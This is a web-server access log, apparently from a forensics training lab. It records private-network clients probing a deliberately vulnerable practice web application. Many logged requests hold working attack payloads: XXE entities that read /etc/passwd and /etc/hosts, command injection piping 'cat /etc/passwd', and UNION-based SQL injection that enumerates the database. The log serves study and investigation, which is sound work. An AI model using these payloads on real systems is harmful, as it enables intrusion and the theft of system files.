10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET / HTTP/1.1" 200 1861 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET /css/bootstrap-responsive.css HTTP/1.1" 200 4540 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET /css/bootstrap.css HTTP/1.1" 200 18255 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET /dirtrav/example2.php?file=/var/www/files/hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET /dirtrav/example1.php?file=hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET /dirtrav/example3.php?file=hacker HTTP/1.1" 200 24462 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:29 +0000] "GET /favicon.ico HTTP/1.1" 200 14930 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:42:32 +0000] "GET /xml/example1.php?xml=%3Ctest%3Ehacker%3C/test%3E HTTP/1.1" 200 896 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:43:11 +0000] "GET /xml/example1.php?xml=%3Ccourse%3Echfi%3C/course%3E HTTP/1.1" 200 894 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:12:50:07 +0000] "GET /xml/example1.php?xml=%3C!DOCTYPE%20test%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2Ftest%3E HTTP/1.1" 200 1336 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:00:28 +0000] "GET /upload HTTP/1.1" 301 552 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:00:28 +0000] "GET /upload/ HTTP/1.1" 200 354 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:00:31 +0000] "GET /uploads/ HTTP/1.1" 404 497 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:01:37 +0000] "GET /upload/access.log HTTP/1.1" 200 2233 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:23 +0000] "GET /xml/example1.php?xml=%3C!DOCTYPE%20test%20[%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fhosts%22%3E]%3E%3Ctest%3E%26xxe%3B%3C%2Ftest%3E HTTP/1.1" 200 976 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:42 +0000] "GET /xml/example1.php? HTTP/1.1" 200 939 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:46 +0000] "GET /xml/ HTTP/1.1" 200 354 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:49 +0000] "GET / HTTP/1.1" 200 1860 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:49 +0000] "GET /dirtrav/example1.php?file=hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:49 +0000] "GET /dirtrav/example2.php?file=/var/www/files/hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:10:49 +0000] "GET /dirtrav/example3.php?file=hacker HTTP/1.1" 200 24462 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:11:08 +0000] "GET /sqli/example1.php?name=root HTTP/1.1" 200 950 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:11:17 +0000] "GET /xml/example2.php?name=hacker HTTP/1.1" 200 895 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:13:11:48 +0000] "GET /upload/access.log HTTP/1.1" 200 4531 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.8 - - [24/Jun/2020:13:24:59 +0000] "GET / HTTP/1.1" 200 1861 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:00 +0000] "GET /css/bootstrap-responsive.css HTTP/1.1" 200 4540 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:00 +0000] "GET /css/bootstrap.css HTTP/1.1" 200 18255 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:00 +0000] "GET /dirtrav/example2.php?file=/var/www/files/hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:00 +0000] "GET /dirtrav/example1.php?file=hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:00 +0000] "GET /dirtrav/example3.php?file=hacker HTTP/1.1" 200 24462 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:00 +0000] "GET /favicon.ico HTTP/1.1" 200 14930 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:03 +0000] "GET /commandexec/example1.php?ip=127.0.0.1 HTTP/1.1" 200 1060 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:17 +0000] "GET /commandexec/example1.php?ip=ls HTTP/1.1" 200 891 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:25:41 +0000] "GET /commandexec/example1.php?ip=127.0.0.1|pwd HTTP/1.1" 200 907 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:26:01 +0000] "GET /commandexec/example1.php?ip=127.0.0.1|ls HTTP/1.1" 200 915 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:31:36 +0000] "GET /commandexec/example1.php?ip=127.0.0.1|cat+/etc/passwd HTTP/1.1" 200 1337 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:33:42 +0000] "GET /upload/access.log HTTP/1.1" 200 6976 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.1 - - [24/Jun/2020:13:39:56 +0000] "GET /upload/access.log HTTP/1.1" 200 6976 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36" 10.0.0.1 - - [24/Jun/2020:13:39:56 +0000] "GET /favicon.ico HTTP/1.1" 200 14930 "http://10.0.0.21/upload/access.log" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36" 10.0.0.1 - - [24/Jun/2020:13:40:23 +0000] "-" 408 0 "-" "-" 10.0.0.8 - - [24/Jun/2020:13:42:35 +0000] "GET / HTTP/1.1" 200 1861 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:42:35 +0000] "GET /dirtrav/example1.php?file=hacker.png HTTP/1.1" 200 24461 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:42:35 +0000] "GET /dirtrav/example3.php?file=hacker HTTP/1.1" 200 24462 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:42:35 +0000] "GET /dirtrav/example2.php?file=/var/www/files/hacker.png HTTP/1.1" 200 24462 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:42:39 +0000] "GET /sqli/example1.php?name=root HTTP/1.1" 200 949 "http://10.0.0.21/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:13:43:06 +0000] "GET /sqli/example1.php?name=%27 HTTP/1.1" 200 886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:14:10:34 +0000] "GET /sqli/example1.php?name=id%20or%201=1%20-- HTTP/1.1" 200 931 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:14:10:39 +0000] "GET /sqli/example1.php?name=id HTTP/1.1" 200 930 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.8 - - [24/Jun/2020:14:10:43 +0000] "GET /sqli/example1.php?name=id%27 HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0" 10.0.0.19 - - [24/Jun/2020:14:46:09 +0000] "GET /sqli/example1.php?name=root HTTP/1.1" 200 950 "http://10.0.0.21/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:22:28 +0000] "GET /sqli/example1.php?name=root%27%20or%20%271%27=%271 HTTP/1.1" 200 985 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:38:34 +0000] "GET /sqli/example1.php?name=root%27%20--%20- HTTP/1.1" 200 950 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:39:26 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,2,3,4,5%20%20--%20- HTTP/1.1" 200 961 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:52:36 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,database(),3,4,5%20%20--%20- HTTP/1.1" 200 966 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:52:49 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,tables(),3,4,5%20%20--%20- HTTP/1.1" 200 885 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:53:14 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,version(),3,4,5%20%20--%20- HTTP/1.1" 200 974 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:58:37 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,table_name,3,4,5%20From%20Information_schema.tables%20where%20Table_Schema=DatabasT()%20--%20- HTTP/1.1" 200 886 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:59:01 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,table_name,3,4,5%20From%20Information_schema.tables%20where%20Table_Schema=DatabasE()%20--%20- HTTP/1.1" 200 964 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:59:40 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,table_name,3,4,5%20From%20Information_schema.tables%20where%20Table_Schema=DatabasE()%20limit%201,2--%20- HTTP/1.1" 200 950 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:15:59:56 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,table_name,3,4,5%20From%20Information_schema.tables%20where%20Table_Schema=DatabasE()%20limit%201,1--%20- HTTP/1.1" 200 950 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:16:00:02 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,table_name,3,4,5%20From%20Information_schema.tables%20where%20Table_Schema=DatabasE()%20limit%203,1--%20- HTTP/1.1" 200 930 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 10.0.0.19 - - [24/Jun/2020:16:00:25 +0000] "GET /sqli/example1.php?name=root%27%20%20UniON%20SeLeCT%201,table_name,3,4,5%20From%20Information_schema.tables%20where%20Table_Schema=DatabasE()%20limit%200,1--%20- HTTP/1.1" 200 950 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"